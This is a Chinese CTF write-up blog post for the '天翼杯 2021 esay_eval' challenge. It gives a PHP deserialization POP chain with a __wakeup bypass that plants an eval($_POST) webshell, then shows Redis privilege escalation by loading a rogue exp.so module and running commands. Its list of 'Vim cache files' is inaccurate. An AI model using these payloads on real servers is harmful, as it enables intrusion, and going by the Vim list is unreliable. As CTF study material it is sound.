[天翼杯 2021]esay_eval-----记Redis提权

最新推荐文章于 2024-05-09 16:41:33 发布
最新推荐文章于 2024-05-09 16:41:33 发布
阅读量129 收藏 1
点赞数
分类专栏: web ctf 文章标签: php 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/131378773
版权
ctf 同时被 2 个专栏收录
22 篇文章 0 订阅
订阅专栏
web
21 篇文章 0 订阅
订阅专栏 
<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

代码审计

发现eval触发__call即可

在传参的正则匹配里,A,B后的键值必须为1(A : 1或者B : 1)

 这里因为php中对类名的大小不敏感,所以在构造pop链后可以将类名改成小写

此外A类中的wakeup方法只要序列化的中的成员数大于实际成员数,即可绕过

<?php
class a{
    public $code ='eval($_POST["a"]);';
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class b{
    function __destruct(){
        echo $this->a->a();
    }
}
$c=new b();
$c->a=new a();
echo serialize($c)
?>

得到后修改成员数

?poc=O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:18:"eval($_POST["a"]);";}} 

 get传参后用蚁剑连接

 打开目录后发现不能访问其他目录但也发现了vim缓存泄露文件

 Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞。

默认情况下其格式为:.<filename>.swp

以下是一些常见的Vim插件和它们可能创建的缓存文件格式:

  • cscope: .cscope.out.<pid>
  • ctags: tags
  • git: .git/index.lock
  • LintHub: .conda/locks/python.interpreter.lock (对于conda环境)

 打开swp文件后发现了redis的密码

所以这里可以通过redis提权来实现RCE

Redis 中的 exp.so 文件通常被用作 Redis 提权的一种方式。这个文件是一个 Redis 模块,它可以在 Redis 服务器中执行任意代码。

Redis 模块是一种可插拔的扩展,它允许用户在 Redis 服务器中添加新的功能。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。

在 Redis 提权攻击中,攻击者通常会利用 Redis 的漏洞或者弱密码,获取 Redis 服务器的访问权限。一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。这个文件会在 Redis 服务器中执行任意代码,从而让攻击者获得服务器的控制权

这里下载一个可以getshell的exp.os文件

GitHub - Dliv3/redis-rogue-server: Redis 4.x/5.x RCE

下载后上传到当前目录下

 然后再下载一个redis管理插件,这个可以直接在蚁剑的插件市场里下载,也可以在下面这里下载

GitHub - Medicean/AS_Redis: AntSword Redis Plugin, required antSword >= 2.0.2.1(开发版)

下载后

 输入redis的密码

打开命令执行框

然后使用上述的module load加载上传的文件即可提权成功

MODULE LOAD /var/www/html/exp.so

 system.exec "ls /"

system.exec "cat /flagaasdbjanssctf"

总结:

php对类名不敏感

vim缓存泄露,以 swp、swo、swn 等其他格式

Redis提权

以上选自:(3条消息) [天翼杯 2021]esay_eval——Redis(主从复制)提权初见_redis主从提权_Leafzzz__的博客-CSDN博客

Sharpery
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[天翼 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)
oZuoShen123的博客
10-09 741
1、看代码,有unserialize函数,说明要反序列化 2、有 eval($this->code) ,说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf 4、A的wakeup里面会把code置空,所以要绕过 起点:B(destruct)  终点:A(call) 链条:B(destruct::a=$a)-> A(call::code=命令)
S7-200 SMART PLC技术参考文档easy_plus_V2.6版本
07-04
S7-200 SMART PLC技术参考文档easy_plus_V2.6版本
[天翼 2021]esay_eval
qq_61988806的博客
05-11 625
这里因为匹配B A 类之后的数字判断是不是1 所以不能增加属性个数,我们可以在加真实属性的个数。这样$this->a->a() 就是 A类中的a()因为没有a()所以call会调用。还有这里匹配的是大写字母 类的名称大小都可以。发现Redis密码,猜测是Redis提权。call方法当调用一个不存在的方法时使用。而destruct的调用要在类销毁时调用。那destruct的调用我们要先创建B类。destruct中调用了不存在的a方法。MODULE LOAD 加载命令。这里B中的a用来实例化A。
[天翼 2021]esay_eval——Redis(主从复制)提权初见
Leaf_initial的博客
04-18 576
但是,当编辑操作意外终止时,这个备份文件就会保留,如果多次编辑文件都意外退出,备份文件并不会覆盖,而是以 swp、swo、swn 等其他格式,依次备份。在开发人员使用 vim 编辑器 编辑文本时,系统会自动生成一个备份文件,当编辑完成后,保存时,原文件会更新,备份文件会被自动删除。文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。顺理成章的,B类中的__destruct()方法明显访问了调用对象中不存在的方法,所以上一级便是他。
[天翼 2021]esay_eval(复现)
qq_53460654的博客
12-17 3002
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();
[天翼 2021]esay_eval复现
cosmoslin的博客
12-01 3372
考点 反序列化绕过wakeup魔术方法 Redis加载恶意so文件获取shell 解题 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __d
『CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1087
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
2021 天翼easy_eval
m0_56059226的博客
10-04 2320
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
2021-天翼
unexpectedthing的博客
05-25 478
文章目录esay_eval考点反序列化Redis加载恶意so获取shell参考链接EzTP考点:wpeasy_pg考点:wp esay_eval 考点 绕过wakeup和正则 新的一种利用so文件攻击redis的方式 反序列化 代码 <?php class A{ public $code = ""; function __call($method,$args){//当调用不可访问或者不存在的方法时调用 eval($this->code); }
easy-grade-pro-4.0.3
11-26
打开之后进入主 界面,界面很简单,第一个是打开EGP文件,第二个是创建,第三个就是退出,第四个就是取消。我们需要的是点击第一个打开文件按钮。
easy-vue-cli:超高可玩性的Vue-cli
04-27
Easy-Vue-Cli --- 超简单的Vue脚手架 开箱即用的vue脚手架(全中文注释) 全薪升级的webpack4版本,优化目录文件 优雅的打包进度条, 让你的终端更加优雅 更简单的proxy配置,只需要再package.json内的proxy配置...
Easy-DnD:Vue.js 2 https 的拖放实现
08-04
Easy-DnD 是 Vue.js 2 的拖放实现,它仅使用标准鼠标事件而不是 HTML5 拖放 API,这是. 将其视为使用鼠标或支持鼠标辅助复制/剪切粘贴将数据从某些组件传输到其他组件的一种方式。 它还允许通过拖放重新排序列表。...
esay-bug-library:问题库(见Issues)
05-09
esay-bug-library 工作bug管理库
如何防止WordPress网站内容被抓取
最新发布
AIDigital的博客
05-09 198
最近在检查网站服务器的访问日志的时候,发现了大量来自同一个IP地址的的请求,用站长工具分析确认了我的网站内容确实是被他人的网站抓取了,我第一时间联系了对方网站的服务器提供商投诉了该网站,要求对方停止侵权行为,然而这只能暂时性的解决问题,为了避免以后再有意外发生,我结合了咨询Hostease的技术支持得到的反馈以及自己从网上了解到的信息,做了以下的优化,分享出来希望能对大家有一些帮助。抓取工具在抓取网站内容的时候,需要依赖网站的RSS feed,对RSS feed做一些小的调整,就可以防止内容被抓取。
【Web】CTFSHOW 中期测评刷题录(1)
uuzeray的博客
05-02 1879
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
BUUCTF——web题目练习
2401_82760239的博客
05-04 682
什么也没有,网页源代码也没有什么信息,于是返回上一个界面,用bp抓包看看里面有没有什么信息。根据页面提示,应该是用菜刀工具进行连接,菜刀和蚁剑作用和功能都差不多,这里我用蚁剑进行连接。再次打开题目环境,删除后上传.phtml的一句话木马,上传成功,用蚁剑连接即可得到flag。查看页面源代码,发现里面有一个跳转页面的连接,点击进去,查看这个页面。然后也没有发现什么信息,源代码也没有什么信息,那就用bp抓包看看。没有什么有用的信息,看看源代码试试。
php利用阿里云短信SDK实现短信发送功能
知码客
05-02 1148
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
PHP 在字符中找出重复次数最多的字符
zzjnlwb的专栏
05-06 308
应该也还有其他很多办法!等我遇到了再更新本篇!我感觉这是最简单的一种办法!
napt、esay-ip、nat有什么区别
05-03
NAPT(Network Address Port Translation)、ESAY-IP(Easy IP)和NAT(Network Address Translation)都是网络地址转换技术,它们的作用都是将内部网络的私有IP地址转换为公网IP地址,以实现内部网络和公网之间的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值